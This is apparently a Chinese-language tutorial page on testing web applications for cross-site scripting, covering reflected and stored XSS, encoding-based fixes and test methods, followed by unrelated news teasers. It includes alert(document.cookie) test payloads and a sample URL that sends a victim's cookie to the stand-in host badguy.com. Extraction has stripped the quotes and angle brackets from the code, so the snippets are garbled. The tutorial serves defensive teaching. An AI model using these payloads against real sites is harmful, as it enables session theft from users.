Web安全测试之XSS

发布时间:2026/7/13 6:14:29

Web安全测试之XSS
假如有下面一个textboxinput typetext nameaddress1 valuevalue1fromvalue1from是来自用户的输入如果用户不是输入value1from,而是输入 /scriptalert(document.cookie)/script!- 那么就会变成input typetext nameaddress1 value/scriptalert(document.cookie)/script!- 嵌入的JavaScript代码将会被执行或者用户输入的是 onfocusalert(document.cookie) 那么就会变成input typetext nameaddress1 value onfocusalert(document.cookie)事件被触发的时候嵌入的JavaScript代码将会被执行攻击的威力取决于用户输入了什么样的脚本当然用户提交的数据还可以通过QueryString(放在URL中)和Cookie发送给服务器. 例如下图HTML EncodeXSS之所以会发生 是因为用户输入的数据变成了代码。 所以我们需要对用户输入的数据进行HTML Encode处理。 将其中的中括号 “单引号”“引号” 之类的特殊字符进行编码。在C#中已经提供了现成的方法只要调用HttpUtility.HtmlEncode(string scritp) 就可以了。 需要引用System.Web程序集Fiddler中也提供了很方便的工具, 点击Toolbar上的TextWizard 按钮XSS 攻击场景1. Dom-Based XSS 漏洞 攻击过程如下Tom 发现了Victim.com中的一个页面有XSS漏洞例如: http://victim.com/search.asp?termapple服务器中Search.asp 页面的代码大概如下html title/title body Results for %Reequest.QueryString(term)% ... /body /htmlTom 先建立一个网站http://badguy.com, 用来接收“偷”来的信息。然后Tom 构造一个恶意的url(如下), 通过某种方式(邮件QQ)发给Monicahttp://victim.com/search.asp?termscriptwindow.open(http://badguy.com?cookiedocument.cookie)/scriptMonica点击了这个URL 嵌入在URL中的恶意Javascript代码就会在Monica的浏览器中执行. 那么Monica在victim.com网站的cookie, 就会被发送到badguy网站中。这样Monica在victim.com 的信息就被Tom盗了.2. Stored XSS(存储式XSS漏洞), 该类型是应用广泛而且有可能影响大Web服务器自身安全的漏洞攻击者将攻击脚本上传到Web服务器上使得所有访问该页面的用户都面临信息泄露的可能。 攻击过程如下Alex发现了网站A上有一个XSS 漏洞该漏洞允许将攻击代码保存在数据库中Alex发布了一篇文章文章中嵌入了恶意JavaScript代码。其他人如Monica访问这片文章的时候嵌入在文章中的恶意Javascript代码就会在Monica的浏览器中执行其会话cookie或者其他信息将被Alex盗走。Dom-Based XSS漏洞威胁用户个体而存储式XSS漏洞所威胁的对象将是大量的用户.XSS 漏洞修复原则 不相信客户输入的数据注意: 攻击代码不一定在script/script中将重要的cookie标记为http only, 这样的话Javascript 中的document.cookie语句就不能获取到cookie了.只允许用户输入我们期望的数据。 例如 年龄的textbox中只允许用户输入数字。 而数字之外的字符都过滤掉。对数据进行Html Encode 处理过滤或移除特殊的Html标签 例如: script, iframe , lt; for , gt; for , quot for过滤JavaScript 事件的标签。例如 onclick, onfocus 等等。如何测试XSS漏洞方法一 查看代码查找关键的变量, 客户端将数据传送给Web 服务端一般通过三种方式 Querystring, Form表单以及cookie. 例如在ASP的程序中通过Request对象获取客户端的变量% strUserCode Request.QueryString(“code”); strUser Request.Form(“USER”); strID Request.Cookies(“ID”); %假如变量没有经过htmlEncode处理 那么这个变量就存在一个XSS漏洞方法二 准备测试脚本/scriptalert(document.cookie)/script!-- scriptalert(document.cookie)/script!-- onclickalert(document.cookie)在网页中的Textbox或者其他能输入数据的地方输入这些测试脚本 看能不能弹出对话框能弹出的话说明存在XSS漏洞在URL中查看有那些变量通过URL把值传给Web服务器 把这些变量的值退换成我们的测试的脚本。 然后看我们的脚本是否能执行方法三: 自动化测试XSS漏洞现在已经有很多XSS扫描工具了。 实现XSS自动化测试非常简单只需要用HttpWebRequest类。 把包含xss 测试脚本。发送给Web服务器。 然后查看HttpWebResponse中我们的XSS测试脚本是否已经注入进去了。HTML Encode 和URL Encode的区别刚开始我老是把这两个东西搞混淆, 其实这是两个不同的东西。HTML编码前面已经介绍过了关于URL 编码是为了符合url的规范。因为在标准的url规范中中文和很多的字符是不允许出现在url中的。例如在baidu中搜索测试汉字。 URL会变成http://www.baidu.com/s?wd%B2%E2%CA%D4%BA%BA%D7%D6rsv_bp0rsv_spt3inputT7477所谓URL编码就是 把所有非字母数字字符都将被替换成百分号%后跟两位十六进制数空格则编码为加号在C#中已经提供了现成的方法只要调用HttpUtility.UrlEncode(string scritp) 就可以了。 需要引用System.Web程序集Fiddler中也提供了很方便的工具, 点击Toolbar上的TextWizard 按钮浏览器中的XSS过滤器为了防止发生XSS 很多浏览器厂商都在浏览器中加入安全机制来过滤XSS。 例如IE8IE9Firefox, Chrome. 都有针对XSS的安全机制。 浏览器会阻止XSS。 例如下图如果需要做测试 最好使用IE7。ASP.NET中的XSS安全机制ASP.NET中有防范XSS的机制对提交的表单会自动检查是否存在XSS当用户试图输入XSS代码的时候ASP.NET会抛出一个错误如下图

相关新闻

LTC6903与PIC18F45K40实现可编程时钟系统设计

LTC6903与PIC18F45K40实现可编程时钟系统设计

2026/7/13 4:11:57

1. 项目背景与核心器件选型 在嵌入式系统设计中,精确的时钟信号生成是许多应用的基础需求。传统方案通常采用固定频率晶体振荡器或压控振荡器(VCXO),但这些方案存在灵活性不足或控制复杂度高的问题。LTC6903这款数字控制振荡器(DCO)与PIC18F45K40微控制器…

M1/M2/M3 Mac部署Selenium自动化环境:ARM架构兼容性实战指南

M1/M2/M3 Mac部署Selenium自动化环境:ARM架构兼容性实战指南

2026/7/11 10:53:37

1. 项目概述与核心挑战最近几年,身边用MacBook M1/M2/M3系列的朋友越来越多,大家从开发到自动化测试,都开始往苹果的ARM架构生态迁移。我自己也是从Intel Mac换到M1 Pro,在搭建Python自动化测试环境,特别是SeleniumChr…

毕业论文AI检测率高的应对策略与修改技巧

毕业论文AI检测率高的应对策略与修改技巧

2026/7/11 13:42:46

1. 毕业论文AI检测率90%的应对策略当看到毕业论文AI检测率高达90%时,很多同学的第一反应是惊慌失措。作为一名经历过多次论文指导的学术工作者,我完全理解这种心情。但请记住,恐慌解决不了任何问题,冷静分析才是关键。首先需要明确…

如何用QKeyMapper实现终极输入设备映射:5步完成键盘鼠标手柄自由转换

如何用QKeyMapper实现终极输入设备映射:5步完成键盘鼠标手柄自由转换

2026/7/13 6:05:47

如何用QKeyMapper实现终极输入设备映射:5步完成键盘鼠标手柄自由转换 【免费下载链接】QKeyMapper [按键映射工具] QKeyMapper,Qt开发Win10&Win11可用,不修改注册表、不需重新启动系统,可立即生效和停止。支持游戏手柄映射到键…

从3D模型到Minecraft建筑:ObjToSchematic让你的创意在方块世界重生

从3D模型到Minecraft建筑:ObjToSchematic让你的创意在方块世界重生

2026/7/13 6:05:47

从3D模型到Minecraft建筑:ObjToSchematic让你的创意在方块世界重生 【免费下载链接】ObjToSchematic A tool to convert 3D models into Minecraft formats such as .schematic, .litematic, .schem and .nbt 项目地址: https://gitcode.com/gh_mirrors/ob/ObjToS…

Easysearch、OpenSearch、Elasticsearch 到底啥关系?一次讲清这仨的恩怨情仇

Easysearch、OpenSearch、Elasticsearch 到底啥关系?一次讲清这仨的恩怨情仇

2026/7/13 6:05:47

Easysearch、OpenSearch、Elasticsearch 到底啥关系?一次讲清这仨的恩怨情仇 写 Easysearch 系列写到现在,评论区总有人问同一个问题:这仨长得这么像,到底谁是谁?是不是换个皮的同一个东西? 其实这事儿真不…

Keil 软件仿真调试:Watch窗口、Memory窗口与Logic Analyzer的5个实战技巧

Keil 软件仿真调试:Watch窗口、Memory窗口与Logic Analyzer的5个实战技巧

2026/7/13 6:05:47

Keil 软件仿真调试:Watch窗口、Memory窗口与Logic Analyzer的5个实战技巧在嵌入式开发中,高效的调试技巧往往能节省大量时间。Keil MDK作为业界广泛使用的开发环境,其软件仿真功能尤其强大。本文将分享5个实战技巧,帮助开发者充分…

数据科学自学路线图:零基础到项目交付的实战路径

数据科学自学路线图:零基础到项目交付的实战路径

2026/7/13 6:05:47

1. 这不是一份“资源清单”,而是一份数据科学自学路线图的实操手稿我带过37个零基础转行的数据科学学员,也帮21位在职工程师重构过知识体系。每次被问“有没有靠谱的自学资源推荐”,我都不直接甩链接——因为90%的人点开第一个教程就卡在环境…

C++实现KD-Tree:从原理到实战,解决多维空间最近邻搜索难题

C++实现KD-Tree:从原理到实战,解决多维空间最近邻搜索难题

2026/7/13 5:55:47

1. 项目概述:从“最近邻”问题到KD-Tree如果你写过游戏,或者处理过地图数据、图像特征匹配,大概率会遇到一个经典问题:给定一个二维(或更高维)空间里的一大堆点,如何快速找到离某个目标点最近的…

Unity游戏文本翻译架构深度解析:XUnity.AutoTranslator的技术实现与工程实践

Unity游戏文本翻译架构深度解析:XUnity.AutoTranslator的技术实现与工程实践

2026/7/12 0:03:42

Unity游戏文本翻译架构深度解析:XUnity.AutoTranslator的技术实现与工程实践 【免费下载链接】XUnity.AutoTranslator 项目地址: https://gitcode.com/gh_mirrors/xu/XUnity.AutoTranslator XUnity.AutoTranslator作为Unity游戏社区中最成熟的文本翻译解决方…

openEuler Raspberry Pi Kernel设备驱动开发指南:为树莓派硬件添加支持

openEuler Raspberry Pi Kernel设备驱动开发指南:为树莓派硬件添加支持

2026/7/12 0:03:42

openEuler Raspberry Pi Kernel设备驱动开发指南:为树莓派硬件添加支持 【免费下载链接】raspberrypi-kernel It provides openEuler kernel source for Raspberry Pi 项目地址: https://gitcode.com/openeuler/raspberrypi-kernel 前往项目官网免费下载&…

openEuler系统集成测试实战:基于smoke-test套件的环境验证技巧

openEuler系统集成测试实战:基于smoke-test套件的环境验证技巧

2026/7/12 0:03:42

openEuler系统集成测试实战:基于smoke-test套件的环境验证技巧 【免费下载链接】integration-test The repo contains test suits for system integration test 项目地址: https://gitcode.com/openeuler/integration-test 前往项目官网免费下载:…

卡梅德生物技术快报|纯化重组蛋白:变异链球菌 SepM 截短蛋白载体构建、诱导优化与纯化重组蛋白全套参数方案

卡梅德生物技术快报|纯化重组蛋白:变异链球菌 SepM 截短蛋白载体构建、诱导优化与纯化重组蛋白全套参数方案

2026/7/13 0:05:25

1 研究背景与现存技术痛点(提出问题)在口腔微生物分子机制研究中,SepM 蛋白酶是调控变异链球菌群体感应、致龋菌素合成的核心功能蛋白,体外功能验证、抗体开发均依赖高纯度可溶性 SepM 蛋白。当前原核表达体系针对 SepM 存在三大技…

卡梅德生物技术快报|重组蛋白的表达和纯化:IMAC 金属螯合色谱全流程工艺手册|基质 - 配基 - 金属离子匹配与蛋白质分离纯化参数优化

卡梅德生物技术快报|重组蛋白的表达和纯化:IMAC 金属螯合色谱全流程工艺手册|基质 - 配基 - 金属离子匹配与蛋白质分离纯化参数优化

2026/7/13 0:05:25

1 研究背景与现存技术痛点(提出问题)基因工程、蛋白质组学、生物制药研发流程中,蛋白质分离纯化是决定下游实验成败的关键环节。当前实验室常规蛋白质分离纯化工艺存在三类难以标准化的技术瓶颈:传统离子交换、分子筛层析无特异性…

卡梅德生物技术快报|蛋白质分离纯化:肠激酶可溶性原核表达 + 两步层析全参数|标准化蛋白质分离纯化 SOP

卡梅德生物技术快报|蛋白质分离纯化:肠激酶可溶性原核表达 + 两步层析全参数|标准化蛋白质分离纯化 SOP

2026/7/13 0:05:25

研究痛点提出(提出问题)重组肠激酶是融合标签切除核心工具酶,当前原核表达体系存在三大标准化难题,直接阻碍可复现的蛋白质分离纯化流程搭建:Trx、GST、单 SUMO 标签融合产物绝大多数为包涵体,沉淀占比超 9…